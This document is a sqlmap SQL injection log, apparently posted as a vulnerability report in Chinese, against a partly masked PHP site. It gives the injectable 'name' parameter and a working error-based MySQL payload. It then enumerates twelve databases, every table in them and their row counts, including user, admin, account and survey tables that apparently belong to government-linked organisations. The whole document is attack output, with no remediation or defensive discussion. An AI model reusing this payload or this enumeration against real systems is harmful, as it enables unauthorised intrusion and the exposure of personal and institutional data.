注入url:
http://**.**.**.**/**.**.**.**mon.php?action=modelquote&cid=1&name=spacecomments
参数:name
sqlmap identified the following injection point(s) with a total of 1806 HTTP(s) requests:
---
Parameter: name (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: action=modelquote&cid=1&name=spacecomments WHERE 2810=2810 AND (SELECT 4947 FROM(SELECT COUNT(*),CONCAT(0x717a787171,(SELECT (ELT(4947=4947,1))),0x716b706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- dmRq
---
web application technology: PHP 5.5.15, Apache 2.4.10
back-end DBMS: MySQL 5.0
available databases [12]:
[*] caiep
[*] cdcol
[*] ciep_mysqldb
[*] citic
[*] citicbak01
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] safea
[*] test
[*] yjh
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: name (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: action=modelquote&cid=1&name=spacecomments WHERE 2810=2810 AND (SELECT 4947 FROM(SELECT COUNT(*),CONCAT(0x717a787171,(SELECT (ELT(4947=4947,1))),0x716b706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- dmRq
---
web application technology: PHP 5.5.15, Apache 2.4.10
back-end DBMS: MySQL 5.0
Database: cdcol
[1 table]
+----------------------------------------------------+
| cds |
+----------------------------------------------------+
Database: phpmyadmin
[12 tables]
+----------------------------------------------------+
| pma__bookmark |
| pma__column_info |
| pma__designer_coords |
| pma__history |
| pma__pdf_pages |
| pma__recent |
| pma__relation |
| pma__table_coords |
| pma__table_info |
| pma__table_uiprefs |
| pma__tracking |
| pma__userconfig |
+----------------------------------------------------+
Database: performance_schema
[52 tables]
+----------------------------------------------------+
| accounts |
| cond_instances |
| events_stages_current |
| events_stages_history |
| events_stages_history_long |
| events_stages_summary_by_account_by_event_name |
| events_stages_summary_by_host_by_event_name |
| events_stages_summary_by_thread_by_event_name |
| events_stages_summary_by_user_by_event_name |
| events_stages_summary_global_by_event_name |
| events_statements_current |
| events_statements_history |
| events_statements_history_long |
| events_statements_summary_by_account_by_event_name |
| events_statements_summary_by_digest |
| events_statements_summary_by_host_by_event_name |
| events_statements_summary_by_thread_by_event_name |
| events_statements_summary_by_user_by_event_name |
| events_statements_summary_global_by_event_name |
| events_waits_current |
| events_waits_history |
| events_waits_history_long |
| events_waits_summary_by_account_by_event_name |
| events_waits_summary_by_host_by_event_name |
| events_waits_summary_by_instance |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_by_user_by_event_name |
| events_waits_summary_global_by_event_name |
| file_instances |
| file_summary_by_event_name |
| file_summary_by_instance |
| host_cache |
| hosts |
| mutex_instances |
| objects_summary_global_by_type |
| performance_timers |
| rwlock_instances |
| session_account_connect_attrs |
| session_connect_attrs |
| setup_actors |
| setup_consumers |
| setup_instruments |
| setup_objects |
| setup_timers |
| socket_instances |
| socket_summary_by_event_name |
| socket_summary_by_instance |
| table_io_waits_summary_by_index_usage |
| table_io_waits_summary_by_table |
| table_lock_waits_summary_by_table |
| threads |
| users |
+----------------------------------------------------+
Database: mysql
[29 tables]
+----------------------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| innodb_index_stats |
| innodb_table_stats |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slave_master_info |
| slave_relay_log_info |
| slave_worker_info |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+----------------------------------------------------+
Database: safea
[46 tables]
+----------------------------------------------------+
| 2010_ciep_collect_info |
| 2010_survey1_info |
| 2010_survey2_info |
| 2010_survey3_info |
| 2011_ciep_collect_info |
| address_info |
| addresslist_info |
| assign_info |
| base_info |
| caiep2safea |
| catalog_info |
| coluass_info |
| column_info |
| cont_info |
| count_info |
| depart_info |
| exp_info |
| group_info |
| label_info |
| link_info |
| note_info |
| org_info |
| para_info |
| poll_info |
| q_expert_gd |
| q_expert_sftg |
| q_fgs_hwrc_en |
| q_fgs_hwrc_zh |
| q_fgs_xzgwry |
| q_fgs_yrdw |
| q_safea_gd |
| q_safea_sftg |
| q_unit_gd |
| q_unit_sftg |
| return_info |
| session_info |
| survey1_info |
| survey2_info |
| survey3_info |
| task_info |
| temp_info |
| tpl_info |
| user_info |
| vars_info |
| zfxxgk_info |
| zfxxgk_note |
+----------------------------------------------------+
Database: caiep
[62 tables]
+----------------------------------------------------+
| achi_info |
| admin_info |
| assi_info |
| assign_info |
| base_info |
| cata_info |
| catagraph_info |
| catalog_info |
| cgzj_info |
| col_info |
| coluass_info |
| column_info |
| cont_info |
| cont_info_temp |
| content_info |
| contkey_info |
| contlabel_info |
| depinfo_info |
| dlg_info |
| dlg_info_new |
| dlglog_info |
| dlgmem_info |
| dlgmgr_info |
| dlgtec_info |
| domain_info |
| exp_info |
| focus_info |
| hpconfig_info |
| imglink_info |
| industry_info |
| label_info |
| link_info |
| mail_info |
| member_info |
| mob_info |
| mobclass_info |
| moblist_info |
| msglog_info |
| news_info |
| note_info |
| para1_info |
| para_info |
| poll_info |
| pollip_info |
| pro_info |
| proj_info |
| projmem_info |
| reader_info |
| renwu_info |
| research_info |
| return_info |
| russian_info |
| stat_info |
| task_info |
| temp1_info |
| temp_info |
| train_info |
| trainpro_info |
| unit_info |
| user_info |
| vars_info |
| visitlog |
+----------------------------------------------------+
Database: ciep_mysqldb
[24 tables]
+----------------------------------------------------+
| acct_info |
| admin_info |
| assign_info |
| catalog_info |
| ciep_info |
| feedback_info |
| filelog_info |
| inqu_info |
| key_info |
| menu_info |
| msglog_info |
| news_info |
| order_info |
| org_info |
| para_info |
| proj_info |
| role_info |
| roleassign_info |
| show_info |
| showuser_info |
| sympos_info |
| token_info |
| topics_info |
| user_info |
+----------------------------------------------------+
Database: yjh
[85 tables]
+----------------------------------------------------+
| [Table]adminsession |
| [Table]ads |
| [Table]announcements |
| [Table]attachments |
| [Table]attachmenttypes |
| [Table]blocks |
| [Table]cache_0 |
| [Table]cache_1 |
| [Table]cache_4 |
| [Table]cache_8 |
| [Table]cache_d |
| [Table]cache |
| [Table]categories |
| [Table]channels |
| [Table]click |
| [Table]clickgroup |
| [Table]clickuser |
| [Table]creditlog |
| [Table]creditrule |
| [Table]crons |
| [Table]customfields |
| [Table]forums |
| [Table]friendlinks |
| [Table]members |
| [Table]modelcolumns |
| [Table]modelfolders |
| [Table]modelinterval |
| [Table]models |
| [Table]pages |
| [Table]polls |
| [Table]postitems |
| [Table]postlog |
| [Table]postmessages |
| [Table]postset |
| [Table]prefields |
| [Table]reports |
| [Table]robotitems |
| [Table]robotlog |
| [Table]robotmessages |
| [Table]robots |
| [Table]rss |
| [Table]settings |
| [Table]sitemaplogs |
| [Table]spacecomments |
| [Table]spaceitems |
| [Table]spacenews |
| [Table]spacepages |
| [Table]spacetags |
| [Table]styles |
| [Table]tagcache |
| [Table]tags |
| [Table]usergroups |
| [Table]userlog |
| [Table]words |
| uc_admins |
| uc_applications |
| uc_badwords |
| uc_domains |
| uc_failedlogins |
| uc_feeds |
| uc_friends |
| uc_mailqueue |
| uc_memberfields |
| uc_members |
| uc_mergemembers |
| uc_newpm |
| uc_notelist |
| uc_pm_indexes |
| uc_pm_lists |
| uc_pm_members |
| uc_pm_messages_0 |
| uc_pm_messages_1 |
| uc_pm_messages_2 |
| uc_pm_messages_3 |
| uc_pm_messages_4 |
| uc_pm_messages_5 |
| uc_pm_messages_6 |
| uc_pm_messages_7 |
| uc_pm_messages_8 |
| uc_pm_messages_9 |
| uc_protectedmembers |
| uc_settings |
| uc_sqlcache |
| uc_tags |
| uc_vars |
+----------------------------------------------------+
Database: citicbak01
[21 tables]
+----------------------------------------------------+
| adminsession_info |
| adodb_logsql |
| apply_info |
| assign_info |
| assigndoctype_info |
| assigndoctypeadmin_info |
| catalog_info |
| doc_info |
| job_info |
| lease_info |
| muser_info |
| news_info |
| note_info |
| para_info |
| photocomment_info |
| photograph_info |
| settings_info |
| task_info |
| user_info |
| vars_info |
| viewdoc_info |
+----------------------------------------------------+
Database: citic
[21 tables]
+----------------------------------------------------+
| adminsession_info |
| adodb_logsql |
| apply_info |
| assign_info |
| assigndoctype_info |
| assigndoctypeadmin_info |
| catalog_info |
| doc_info |
| job_info |
| lease_info |
| muser_info |
| news_info |
| note_info |
| para_info |
| photocomment_info |
| photograph_info |
| settings_info |
| task_info |
| user_info |
| vars_info |
| viewdoc_info |
+----------------------------------------------------+
Database: information_schema
[59 tables]
+----------------------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_PER_INDEX |
| INNODB_CMP_PER_INDEX_RESET |
| INNODB_CMP_RESET |
| INNODB_FT_BEING_DELETED |
| INNODB_FT_CONFIG |
| INNODB_FT_DEFAULT_STOPWORD |
| INNODB_FT_DELETED |
| INNODB_FT_INDEX_CACHE |
| INNODB_FT_INDEX_TABLE |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_METRICS |
| INNODB_SYS_COLUMNS |
| INNODB_SYS_DATAFILES |
| INNODB_SYS_FIELDS |
| INNODB_SYS_FOREIGN |
| INNODB_SYS_FOREIGN_COLS |
| INNODB_SYS_INDEXES |
| INNODB_SYS_TABLES |
| INNODB_SYS_TABLESPACES |
| INNODB_SYS_TABLESTATS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| OPTIMIZER_TRACE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+----------------------------------------------------+
Database: cdcol
+----------------------------------------------------+---------+
| Table | Entries |
+----------------------------------------------------+---------+
| cds | 2 |
+----------------------------------------------------+---------+
Database: phpmyadmin
+----------------------------------------------------+---------+
| Table | Entries |
+----------------------------------------------------+---------+
| pma__column_info | 1 |
| pma__recent | 1 |
| pma__userconfig | 1 |
+----------------------------------------------------+---------+
Database: citic
+----------------------------------------------------+---------+
| Table | Entries |
+----------------------------------------------------+---------+
| apply_info | 589667 |
| viewdoc_info | 28740 |
| note_info | 6126 |
| assigndoctype_info | 1076 |
| doc_info | 1050 |
| user_info | 54 |
| para_info | 50 |
| vars_info | 23 |
| catalog_info | 20 |
| assigndoctypeadmin_info | 19 |
| task_info | 15 |
| assign_info | 14 |
| adminsession_info | 13 |
| muser_info | 12 |
| settings_info | 12 |
| photograph_info | 5 |
| adodb_logsql | 3 |
| job_info | 2 |
| news_info | 2 |
| lease_info | 1 |
| photocomment_info | 1 |
+----------------------------------------------------+---------+
Database: performance_schema
+----------------------------------------------------+---------+
| Table | Entries |
+----------------------------------------------------+---------+
| events_waits_summary_by_thread_by_event_name | 5301 |
| events_statements_summary_by_thread_by_event_name | 3135 |
| events_stages_summary_by_thread_by_event_name | 2052 |
| events_waits_summary_by_account_by_event_name | 837 |
| events_waits_summary_by_host_by_event_name | 558 |
| events_waits_summary_by_user_by_event_name | 558 |
| setup_instruments | 555 |
| events_statements_summary_by_account_by_event_name | 495 |
| events_waits_summary_by_instance | 351 |
| file_instances | 351 |
| file_summary_by_instance | 351 |
| events_statements_summary_by_host_by_event_name | 330 |
| events_statements_summary_by_user_by_event_name | 330 |
| events_stages_summary_by_account_by_event_name | 324 |
| table_io_waits_summary_by_index_usage | 295 |
| events_waits_summary_global_by_event_name | 279 |
| events_statements_summary_by_digest | 244 |
| events_stages_summary_by_host_by_event_name | 216 |
| events_stages_summary_by_user_by_event_name | 216 |
| events_statements_summary_global_by_event_name | 165 |
| objects_summary_global_by_type | 149 |
| table_io_waits_summary_by_table | 149 |
| table_lock_waits_summary_by_table | 149 |
| events_stages_summary_global_by_event_name | 108 |
| file_summary_by_event_name | 46 |
| threads | 19 |
| setup_consumers | 12 |
| host_cache | 5 |
| performance_timers | 5 |
| setup_objects | 4 |
| setup_timers | 4 |
| accounts | 3 |
| socket_summary_by_event_name | 3 |
| hosts | 2 |
| users | 2 |
| events_statements_current | 1 |
| setup_actors | 1 |
+----------------------------------------------------+---------+
Database: yjh
+----------------------------------------------------+---------+
| Table | Entries |
+----------------------------------------------------+---------+
| uc_feeds | 67 |
| uc_settings | 26 |
| uc_notelist | 4 |
| uc_applications | 1 |
| uc_failedlogins | 1 |
| uc_memberfields | 1 |
| uc_members | 1 |
| uc_protectedmembers | 1 |
+----------------------------------------------------+---------+
Database: safea
+----------------------------------------------------+---------+
| Table | Entries |
+----------------------------------------------------+---------+
| count_info | 5298670 |
| `2010_survey2_info` | 175062 |
| `2010_survey3_info` | 169063 |
| `2011_ciep_collect_info` | 122441 |
| `2010_survey1_info` | 95649 |
| q_fgs_yrdw | 30582 |
| address_info | 30162 |
| q_fgs_xzgwry | 21889 |
| q_fgs_hwrc_en | 14135 |
| q_fgs_hwrc_zh | 13957 |
| caiep2safea | 4788 |
| cont_info | 4480 |
| return_info | 4309 |
| note_info | 2971 |
| q_expert_gd | 1706 |
| q_unit_sftg | 1552 |
| q_expert_sftg | 1529 |
| q_unit_gd | 1350 |
| q_safea_sftg | 774 |
| label_info | 760 |
| vars_info | 756 |
| survey2_info | 485 |
| survey1_info | 384 |
| q_safea_gd | 288 |
| session_info | 239 |
| assign_info | 173 |
| catalog_info | 160 |
| column_info | 152 |
| para_info | 132 |
| coluass_info | 95 |
| survey3_info | 55 |
| task_info | 47 |
| user_info | 47 |
| poll_info | 37 |
| group_info | 35 |
| depart_info | 31 |
| base_info | 28 |
| link_info | 28 |
| zfxxgk_info | 26 |
| `2010_ciep_collect_info` | 18 |
| temp_info | 16 |
| zfxxgk_note | 10 |
| addresslist_info | 5 |
| tpl_info | 1 |
+----------------------------------------------------+---------+
Database: ciep_mysqldb
+----------------------------------------------------+---------+
| Table | Entries |
+----------------------------------------------------+---------+
| order_info | 6351 |
| user_info | 3755 |
| acct_info | 3715 |
| para_info | 885 |
| proj_info | 382 |
| showuser_info | 228 |
| inqu_info | 138 |
| news_info | 106 |
| topics_info | 64 |
| catalog_info | 56 |
| assign_info | 27 |
| menu_info | 27 |
| org_info | 18 |
| feedback_info | 7 |
| show_info | 6 |
| admin_info | 5 |
| filelog_info | 4 |
| ciep_info | 1 |
| sympos_info | 1 |
+----------------------------------------------------+---------+
Database: mysql
+----------------------------------------------------+---------+
| Table | Entries |
+----------------------------------------------------+---------+
| time_zone_transition | 117210 |
| time_zone_transition_type | 7716 |
| time_zone | 1685 |
| time_zone_name | 1685 |
| columns_priv | 29 |
| `user` | 7 |
| innodb_index_stats | 6 |
| tables_priv | 4 |
| db | 3 |
| innodb_table_stats | 2 |
| proc | 1 |
| proxies_priv | 1 |
+----------------------------------------------------+---------+
Database: citicbak01
+----------------------------------------------------+---------+
| Table | Entries |
+----------------------------------------------------+---------+
| viewdoc_info | 28186 |
| note_info | 4964 |
| assigndoctype_info | 1022 |
| doc_info | 1016 |
| user_info | 54 |
| para_info | 49 |
| vars_info | 23 |
| catalog_info | 20 |
| task_info | 15 |
| assign_info | 14 |
| assigndoctypeadmin_info | 14 |
| adminsession_info | 13 |
| muser_info | 12 |
| settings_info | 12 |
| photograph_info | 5 |
| adodb_logsql | 3 |
| job_info | 2 |
| news_info | 2 |
| lease_info | 1 |
| photocomment_info | 1 |
+----------------------------------------------------+---------+
Database: information_schema
+----------------------------------------------------+---------+
| Table | Entries |
+----------------------------------------------------+---------+
| COLUMNS | 4793 |
| INNODB_BUFFER_PAGE | 1023 |
| STATISTICS | 598 |
| SESSION_VARIABLES | 446 |
| GLOBAL_VARIABLES | 432 |
| PARTITIONS | 412 |
| TABLES | 412 |
| GLOBAL_STATUS | 342 |
| KEY_COLUMN_USAGE | 342 |
| SESSION_STATUS | 342 |
| TABLE_CONSTRAINTS | 284 |
| INNODB_BUFFER_PAGE_LRU | 256 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 219 |
| COLLATIONS | 219 |
| INNODB_METRICS | 214 |
| USER_PRIVILEGES | 115 |
| INNODB_SYS_COLUMNS | 84 |
| PLUGINS | 42 |
| CHARACTER_SETS | 40 |
| INNODB_FT_DEFAULT_STOPWORD | 36 |
| COLUMN_PRIVILEGES | 29 |
| SCHEMA_PRIVILEGES | 23 |
| INNODB_SYS_FIELDS | 19 |
| INNODB_SYS_INDEXES | 13 |
| SCHEMATA | 12 |
| INNODB_SYS_TABLES | 11 |
| INNODB_SYS_TABLESTATS | 11 |
| ENGINES | 9 |
| INNODB_SYS_DATAFILES | 7 |
| INNODB_SYS_TABLESPACES | 7 |
| INNODB_CMP | 5 |
| INNODB_CMP_RESET | 5 |
| INNODB_CMPMEM | 5 |
| INNODB_CMPMEM_RESET | 5 |
| TABLE_PRIVILEGES | 2 |
| INNODB_BUFFER_POOL_STATS | 1 |
| PROCESSLIST | 1 |
| ROUTINES | 1 |
+----------------------------------------------------+---------+
RT
